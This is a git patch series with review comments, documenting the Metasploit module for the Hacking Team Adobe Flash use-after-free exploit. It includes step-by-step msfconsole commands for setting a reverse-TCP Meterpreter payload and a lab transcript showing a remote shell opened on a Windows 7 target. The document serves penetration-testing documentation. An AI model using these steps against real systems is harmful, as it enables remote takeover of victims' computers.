From 4b36a42efffd74b9fc7b889a1e1b9d378a771bc9 Mon Sep 17 00:00:00 2001 From: itsmeroy2012 Date: Sat, 25 Mar 2017 03:54:17 +0530 Subject: [PATCH 1/9] Documentation on adobe_flash_hacking_team_uaf --- .../browser/adobe_flash_hacking_team_uaf.md | 75 +++++++++++++++++++ 1 file changed, 75 insertions(+) create mode 100755 documentation/modules/exploit/multi/browser/adobe_flash_hacking_team_uaf.md diff --git a/documentation/modules/exploit/multi/browser/adobe_flash_hacking_team_uaf.md b/documentation/modules/exploit/multi/browser/adobe_flash_hacking_team_uaf.md new file mode 100755 index 0000000000..b90c96ad1a --- /dev/null +++ b/documentation/modules/exploit/multi/browser/adobe_flash_hacking_team_uaf.md 
@@ -0,0 +1,75 @@ +##Description + +This module exploits an use after free on Adobe Flash Player. The vulnerability, discovered by Hacking Team and made public as part of the July 2015 data leak, was described as an Use After Free while handling ByteArray objects. This module has been tested successfully on: +Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.194, +Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.194, +Windows 8.1 (32-bit), IE11 and Adobe Flash 18.0.0.194, +Windows 8.1 (32-bit), Firefox and Adobe Flash 18.0.0.194, and +Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.468. + + + + + +## Verification Steps + + + +1. Do: ```use exploit/multi/browser/adobe_flash_hacking_team_uaf``` +2. Do: ```set payload windows/meterpreter/reverse_tcp``` +2. Do: ```set LHOST [IP]``` +3. Do: ```set SRVHOST [IP]``` +3. Do: ```set URIPATH / [PATH]``` +4. Do: ```run``` + +## Sample Output + +``` +msf > use exploit/multi/browser/adobe_flash_hacking_team_uaf +msf exploit(adobe_flash_hacking_team_uaf) > set payload windows/meterpreter/reverse_tcp +payload => windows/meterpreter/reverse_tcp +msf exploit(adobe_flash_hacking_team_uaf) > set lhost 172.16.178.160 +lhost => 172.16.178.160 +msf exploit(adobe_flash_hacking_team_uaf) > set srvhost 172.16.178.160 +srvhost => 172.16.178.160 +msf exploit(adobe_flash_hacking_team_uaf) > set uripath / +uripath => / +msf exploit(adobe_flash_hacking_team_uaf) > show options + +Module options (exploit/multi/browser/adobe_flash_hacking_team_uaf): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + Retries true no Allow the browser to retry the module + SRVHOST 172.16.178.160 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 + SRVPORT 8080 yes The local port to listen on. 
+ SSL false no Negotiate SSL for incoming connections + SSLCert no Path to a custom SSL certificate (default is randomly generated) + URIPATH / no The URI to use for this exploit (default is random) + + +Payload options (windows/meterpreter/reverse_tcp): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) + LHOST 172.16.178.160 yes The listen address + LPORT 4444 yes The listen port + + +Exploit target: + + Id Name + -- ---- + 0 Windows + + +msf exploit(adobe_flash_hacking_team_uaf) > exploit +[*] Exploit running as background job. + +[*] Started reverse TCP handler on 172.16.178.160:4444 +[*] Using URL: http://172.16.178.160:8080/ +[*] Server started. +msf exploit(adobe_flash_hacking_team_uaf) > [*] 172.16.178.203 adobe_flash_hacking_team_uaf - Gathering target information for 172.16.178.203 +[*] 172.16.178.203 adobe_flash_hacking_team_uaf - Sending HTML response to 172.16.178.203 +``` From 52ff073d5151c51be4ae67d9f35d30fb9f10acab Mon Sep 17 00:00:00 2001 From: itsmeroy2012 Date: Sat, 25 Mar 2017 03:56:19 +0530 Subject: [PATCH 2/9] Documentation on adobe_flash_hacking_team_uaf updated 1.1 --- .../exploit/multi/browser/adobe_flash_hacking_team_uaf.md | 6 ------ 1 file changed, 6 deletions(-) diff --git a/documentation/modules/exploit/multi/browser/adobe_flash_hacking_team_uaf.md b/documentation/modules/exploit/multi/browser/adobe_flash_hacking_team_uaf.md index b90c96ad1a..1f3992a0fd 100755 --- a/documentation/modules/exploit/multi/browser/adobe_flash_hacking_team_uaf.md +++ b/documentation/modules/exploit/multi/browser/adobe_flash_hacking_team_uaf.md 
@@ -7,14 +7,8 @@ Windows 8.1 (32-bit), IE11 and Adobe Flash 18.0.0.194, Windows 8.1 (32-bit), Firefox and Adobe Flash 18.0.0.194, and Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.468. - - - - ## Verification Steps - - 1. Do: ```use exploit/multi/browser/adobe_flash_hacking_team_uaf``` 2. Do: ```set payload windows/meterpreter/reverse_tcp``` 2. Do: ```set LHOST [IP]``` From cb65a4d90911057e82a96562feb6829949d3ee06 Mon Sep 17 00:00:00 2001 From: itsmeroy2012 Date: Sat, 25 Mar 2017 03:58:06 +0530 Subject: [PATCH 3/9] Documentation on adobe_flash_hacking_team_uaf updated 1.2 --- .../exploit/multi/browser/adobe_flash_hacking_team_uaf.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/documentation/modules/exploit/multi/browser/adobe_flash_hacking_team_uaf.md b/documentation/modules/exploit/multi/browser/adobe_flash_hacking_team_uaf.md index 1f3992a0fd..9b08f83e47 100755 --- a/documentation/modules/exploit/multi/browser/adobe_flash_hacking_team_uaf.md +++ b/documentation/modules/exploit/multi/browser/adobe_flash_hacking_team_uaf.md @@ -1,4 +1,4 @@ -##Description +## Description This module exploits an use after free on Adobe Flash Player. The vulnerability, discovered by Hacking Team and made public as part of the July 2015 data leak, was described as an Use After Free while handling ByteArray objects. This module has been tested successfully on: Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.194, From b2e6c22fdf4628ec3764f0433d9a6b8b511cba9f Mon Sep 17 00:00:00 2001 From: itsmeroy2012 Date: Sat, 25 Mar 2017 04:02:43 +0530 Subject: [PATCH 4/9] Documentation on adobe_flash_hacking_team_uaf updated 1.3 --- .../browser/adobe_flash_hacking_team_uaf.md | 18 +++++++++++------- 1 file changed, 11 insertions(+), 7 deletions(-) diff --git a/documentation/modules/exploit/multi/browser/adobe_flash_hacking_team_uaf.md b/documentation/modules/exploit/multi/browser/adobe_flash_hacking_team_uaf.md index 9b08f83e47..77f8b6f39f 100755 
--- a/documentation/modules/exploit/multi/browser/adobe_flash_hacking_team_uaf.md +++ b/documentation/modules/exploit/multi/browser/adobe_flash_hacking_team_uaf.md @@ -1,11 +1,15 @@ ## Description This module exploits an use after free on Adobe Flash Player. The vulnerability, discovered by Hacking Team and made public as part of the July 2015 data leak, was described as an Use After Free while handling ByteArray objects. This module has been tested successfully on: -Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.194, -Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.194, -Windows 8.1 (32-bit), IE11 and Adobe Flash 18.0.0.194, -Windows 8.1 (32-bit), Firefox and Adobe Flash 18.0.0.194, and -Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.468. +1. Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.194. +2. Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.194. +3. Windows 8.1 (32-bit), IE11 and Adobe Flash 18.0.0.194. +4. Windows 8.1 (32-bit), Firefox and Adobe Flash 18.0.0.194. +5. Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.468. + +## Adobe Flash Player + +Adobe Flash Player (labeled Shockwave Flash in Internet Explorer and Firefox) is freeware software for using content created on the Adobe Flash platform, including viewing multimedia, executing rich Internet applications, and streaming video and audio. Flash Player can run from a web browser as a browser plug-in or on supported mobile devices. ## Verification Steps 
@@ -64,6 +68,6 @@ msf exploit(adobe_flash_hacking_team_uaf) > exploit [*] Started reverse TCP handler on 172.16.178.160:4444 [*] Using URL: http://172.16.178.160:8080/ [*] Server started. -msf exploit(adobe_flash_hacking_team_uaf) > [*] 172.16.178.203 adobe_flash_hacking_team_uaf - Gathering target information for 172.16.178.203 -[*] 172.16.178.203 adobe_flash_hacking_team_uaf - Sending HTML response to 172.16.178.203 +msf exploit(adobe_flash_hacking_team_uaf) > [*] 172.16.178.160 adobe_flash_hacking_team_uaf - Gathering target information for 172.16.178.160 +[*] 172.16.178.160 adobe_flash_hacking_team_uaf - Sending HTML response to 172.16.178.160 ``` From 6b6dd73b090e0b25e686bbc8337650f4d969d030 Mon Sep 17 00:00:00 2001 From: itsmeroy2012 Date: Sat, 25 Mar 2017 12:52:12 +0530 Subject: [PATCH 5/9] Documentation on adobe_flash_hacking_team_uaf updated 1.4 --- .../browser/adobe_flash_hacking_team_uaf.md | 33 +------------------ 1 file changed, 1 insertion(+), 32 deletions(-) diff --git a/documentation/modules/exploit/multi/browser/adobe_flash_hacking_team_uaf.md b/documentation/modules/exploit/multi/browser/adobe_flash_hacking_team_uaf.md index 77f8b6f39f..3cca7241b4 100755 --- a/documentation/modules/exploit/multi/browser/adobe_flash_hacking_team_uaf.md +++ b/documentation/modules/exploit/multi/browser/adobe_flash_hacking_team_uaf.md @@ -7,9 +7,8 @@ This module exploits an use after free on Adobe Flash Player. The vulnerability, 4. Windows 8.1 (32-bit), Firefox and Adobe Flash 18.0.0.194. 5. Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.468. -## Adobe Flash Player -Adobe Flash Player (labeled Shockwave Flash in Internet Explorer and Firefox) is freeware software for using content created on the Adobe Flash platform, including viewing multimedia, executing rich Internet applications, and streaming video and audio. Flash Player can run from a web browser as a browser plug-in or on supported mobile devices. + ## Verification Steps 
@@ -32,36 +31,6 @@ msf exploit(adobe_flash_hacking_team_uaf) > set srvhost 172.16.178.160 srvhost => 172.16.178.160 msf exploit(adobe_flash_hacking_team_uaf) > set uripath / uripath => / -msf exploit(adobe_flash_hacking_team_uaf) > show options - -Module options (exploit/multi/browser/adobe_flash_hacking_team_uaf): - - Name Current Setting Required Description - ---- --------------- -------- ----------- - Retries true no Allow the browser to retry the module - SRVHOST 172.16.178.160 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 - SRVPORT 8080 yes The local port to listen on. - SSL false no Negotiate SSL for incoming connections - SSLCert no Path to a custom SSL certificate (default is randomly generated) - URIPATH / no The URI to use for this exploit (default is random) - - -Payload options (windows/meterpreter/reverse_tcp): - - Name Current Setting Required Description - ---- --------------- -------- ----------- - EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) - LHOST 172.16.178.160 yes The listen address - LPORT 4444 yes The listen port - - -Exploit target: - - Id Name - -- ---- - 0 Windows - - msf exploit(adobe_flash_hacking_team_uaf) > exploit [*] Exploit running as background job. From 2c47d798b6a79cf5e29006337e03ab11548d5bfc Mon Sep 17 00:00:00 2001 From: itsmeroy2012 Date: Sat, 25 Mar 2017 12:53:23 +0530 Subject: [PATCH 6/9] Documentation on adobe_flash_hacking_team_uaf updated 1.5 --- .../exploit/multi/browser/adobe_flash_hacking_team_uaf.md | 3 --- 1 file changed, 3 deletions(-) diff --git a/documentation/modules/exploit/multi/browser/adobe_flash_hacking_team_uaf.md b/documentation/modules/exploit/multi/browser/adobe_flash_hacking_team_uaf.md index 3cca7241b4..7918102bec 100755 --- a/documentation/modules/exploit/multi/browser/adobe_flash_hacking_team_uaf.md +++ b/documentation/modules/exploit/multi/browser/adobe_flash_hacking_team_uaf.md 
@@ -7,9 +7,6 @@ This module exploits an use after free on Adobe Flash Player. The vulnerability, 4. Windows 8.1 (32-bit), Firefox and Adobe Flash 18.0.0.194. 5. Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.468. - - - ## Verification Steps 1. Do: ```use exploit/multi/browser/adobe_flash_hacking_team_uaf``` From 4cba08a74de307b0a5ebe7c2d6b40f341d51d5b9 Mon Sep 17 00:00:00 2001 From: itsmeroy2012 Date: Sun, 26 Mar 2017 22:55:13 +0530 Subject: [PATCH 7/9] Documentation on adobe_flash_hacking_team_uaf updated 1.6 --- .../browser/adobe_flash_hacking_team_uaf.md | 47 ++++++++++++++----- 1 file changed, 35 insertions(+), 12 deletions(-) diff --git a/documentation/modules/exploit/multi/browser/adobe_flash_hacking_team_uaf.md b/documentation/modules/exploit/multi/browser/adobe_flash_hacking_team_uaf.md index 7918102bec..ec813bc6ea 100755 --- a/documentation/modules/exploit/multi/browser/adobe_flash_hacking_team_uaf.md +++ b/documentation/modules/exploit/multi/browser/adobe_flash_hacking_team_uaf.md 
@@ -19,21 +19,44 @@ This module exploits an use after free on Adobe Flash Player. The vulnerability, ## Sample Output ``` -msf > use exploit/multi/browser/adobe_flash_hacking_team_uaf -msf exploit(adobe_flash_hacking_team_uaf) > set payload windows/meterpreter/reverse_tcp -payload => windows/meterpreter/reverse_tcp -msf exploit(adobe_flash_hacking_team_uaf) > set lhost 172.16.178.160 -lhost => 172.16.178.160 -msf exploit(adobe_flash_hacking_team_uaf) > set srvhost 172.16.178.160 -srvhost => 172.16.178.160 -msf exploit(adobe_flash_hacking_team_uaf) > set uripath / -uripath => / +msf > use exploit/multi/browser/adobe_flash_hacking_team_uaf +msf exploit(adobe_flash_hacking_team_uaf) > set PAYLOAD windows/meterpreter/reverse_tcp +PAYLOAD => windows/meterpreter/reverse_tcp +msf exploit(adobe_flash_hacking_team_uaf) > set LHOST 172.16.178.160 +LHOST => 172.16.178.160 +msf exploit(adobe_flash_hacking_team_uaf) > set srvhost 172.16.178.80 +srvhost => 172.16.178.80 +msf exploit(adobe_flash_hacking_team_uaf) > set SRVPORT 80 +SRVPORT => 80 +msf exploit(adobe_flash_hacking_team_uaf) > set URIPATH / +URIPATH => / msf exploit(adobe_flash_hacking_team_uaf) > exploit [*] Exploit running as background job. [*] Started reverse TCP handler on 172.16.178.160:4444 -[*] Using URL: http://172.16.178.160:8080/ +[*] Using URL: http://0.0.0.0:80/ +msf exploit(adobe_flash_hacking_team_uaf) > [*] Local IP: http://127.0.0.1:80/ [*] Server started. -msf exploit(adobe_flash_hacking_team_uaf) > [*] 172.16.178.160 adobe_flash_hacking_team_uaf - Gathering target information for 172.16.178.160 -[*] 172.16.178.160 adobe_flash_hacking_team_uaf - Sending HTML response to 172.16.178.160 + +msf exploit(adobe_flash_hacking_team_uaf) > +[*] 172.16.178.80 adobe_flash_hacking_team_uaf - Gathering target information. +[*] 172.16.178.80 adobe_flash_hacking_team_uaf - Sending HTML response. 
+[*] 172.16.178.80 adobe_flash_hacking_team_uaf - Request: /rGaaQS/ +[*] 172.16.178.80 adobe_flash_hacking_team_uaf - Sending HTML... +[*] 172.16.178.80 adobe_flash_hacking_team_uaf - Request: /rGaaQS/AsvCG.swf +[*] 172.16.178.80 adobe_flash_hacking_team_uaf - Sending SWF... +[*] Sending stage (957999 bytes) to 172.16.178.80 +[*] Meterpreter session 1 opened (172.16.178.160:4444 -> 172.16.178.80:49167) at 2017-03-26 22:51:29 +0900 + +msf exploit(adobe_flash_hacking_team_uaf) > sessions -i 1 +[*] Starting interaction with 1... + +meterpreter > sysinfo +Computer : WIN7X64TJ7XH-PC +OS : Windows 7 (Build 7601, Service Pack 1). +Architecture : x64 (Current Process is WOW64) +System Language : en_US +Domain : WORKGROUP +Logged On Users : 2 +Meterpreter : x86/win32 ``` From 25f7835832f32bc6215dca3c1745ef258c72489b Mon Sep 17 00:00:00 2001 From: itsmeroy2012 Date: Tue, 28 Mar 2017 08:09:28 +0530 Subject: [PATCH 8/9] adding browser details --- .../exploit/multi/browser/adobe_flash_hacking_team_uaf.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/documentation/modules/exploit/multi/browser/adobe_flash_hacking_team_uaf.md b/documentation/modules/exploit/multi/browser/adobe_flash_hacking_team_uaf.md index ec813bc6ea..b1d28612e2 100755 --- a/documentation/modules/exploit/multi/browser/adobe_flash_hacking_team_uaf.md +++ b/documentation/modules/exploit/multi/browser/adobe_flash_hacking_team_uaf.md @@ -18,6 +18,8 @@ This module exploits an use after free on Adobe Flash Player. The vulnerability, ## Sample Output +### IE 11 and Flash 18.0.0.194 + ``` msf > use exploit/multi/browser/adobe_flash_hacking_team_uaf msf exploit(adobe_flash_hacking_team_uaf) > set PAYLOAD windows/meterpreter/reverse_tcp From 9a0c455f9f6f752db0537243edcee24bd28c01a8 Mon Sep 17 00:00:00 2001 From: h00die Date: Thu, 30 Mar 2017 09:14:03 -0400 Subject: [PATCH 9/9] add newline --- .../exploit/multi/browser/adobe_flash_hacking_team_uaf.md | 1 + 1 file changed, 1 insertion(+) 
diff --git a/documentation/modules/exploit/multi/browser/adobe_flash_hacking_team_uaf.md b/documentation/modules/exploit/multi/browser/adobe_flash_hacking_team_uaf.md index b1d28612e2..ac392d61ae 100755 --- a/documentation/modules/exploit/multi/browser/adobe_flash_hacking_team_uaf.md +++ b/documentation/modules/exploit/multi/browser/adobe_flash_hacking_team_uaf.md @@ -1,6 +1,7 @@ ## Description This module exploits an use after free on Adobe Flash Player. The vulnerability, discovered by Hacking Team and made public as part of the July 2015 data leak, was described as an Use After Free while handling ByteArray objects. This module has been tested successfully on: + 1. Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.194. 2. Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.194. 3. Windows 8.1 (32-bit), IE11 and Adobe Flash 18.0.0.194.
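Review bot: In patch 1/9 (hunk @@ -0,0 +1,75 @@) the Verification Steps are numbered 1, 2, 2, 3, 3, 4, and `set URIPATH / [PATH]` carries a stray `/` before the placeholder; renumber the steps 1 through 6 and write `set URIPATH [PATH]` (or drop the step, since the sample simply uses `/`). The Description says "an use after free" and "an Use After Free"; "a use-after-free" is the standard form, and the paragraph should cite the vulnerability identifier the module's references list carries rather than only "discovered by Hacking Team". The file is also created with mode 100755; a markdown document should be 100644. Finally, the sample output ends at "Sending HTML response" with no session opened, so it does not show the module succeeding.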
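Review bot: Whitespace-only fixups of the series' own earlier commits belong squashed into patch 1/9 rather than kept as separate commits: patch 2/9 (hunk @@ -7,14 +7,8 @@) removes blank lines that patch 1/9 added, and the blank-line cleanups in 5/9 and 6/9 do the same for lines introduced in 4/9 and 5/9.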
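Review bot: In patch 4/9 (hunk @@ -1,11 +1,15 @@) the new "## Adobe Flash Player" section is a general product description (freeware, multimedia, mobile devices) that says nothing about the module, the affected Flash versions or the ByteArray bug; either replace it with the version range the module targets and the version that fixed it, or drop it. Patch 5/9 deletes the section again, so the two commits cancel out and should not both be in the series. While reworking the tested list, make the wording consistent: "(32-bit)" in items 1 to 4 versus "(32 bits)" in item 5.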
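Review bot: In patch 4/9 (hunk @@ -64,6 +68,6 @@) the client address in the two log lines is changed from 172.16.178.203 to 172.16.178.160, which is the value set for LHOST and SRVHOST, so the sample now shows the listener serving itself. Sample output should be pasted from a real run rather than edited by hand; patch 7/9 replaces these lines again anyway.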
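Review bot: In patch 5/9 (hunk @@ -32,36 +31,6 @@) removing the `show options` listing deletes the only place the document describes Retries, SRVPORT, SSL, SSLCert and URIPATH; if the listing is too long for the sample transcript, add a short Options section naming those settings instead of dropping the information.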
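Review bot: In patch 7/9 (hunk @@ -19,21 +19,44 @@) the transcript is inconsistent with its own settings: `set srvhost 172.16.178.80` is followed by "Using URL: http://0.0.0.0:80/" and "Local IP: http://127.0.0.1:80/", i.e. the URL line does not reflect the configured SRVHOST, and 172.16.178.80 then appears as the client address in every module log line, so .80 reads as the victim rather than the server. Re-run with SRVHOST set to the listener's own address (172.16.178.160, matching LHOST) and paste the unedited output. The `sysinfo` block reports "OS : Windows 7 (Build 7601, Service Pack 1)" with "Architecture : x64 (Current Process is WOW64)", while the Description lists only 32-bit Windows 7; add the x64 OS with 32-bit IE and Flash to the tested list or state it above the transcript. Also pick one case for option names: the hunk mixes `set PAYLOAD`/`set LHOST` with `set srvhost`.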
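Review bot: In patch 8/9 (hunk @@ -18,6 +18,8 @@) the new "### IE 11 and Flash 18.0.0.194" subheading implies per-browser sections, but only one transcript exists; either add the Firefox and Linux runs the Description claims were tested, or fold the browser, Flash version and OS (Windows 7 SP1 x64, per `sysinfo`) into the Sample Output heading or a one-line lead-in.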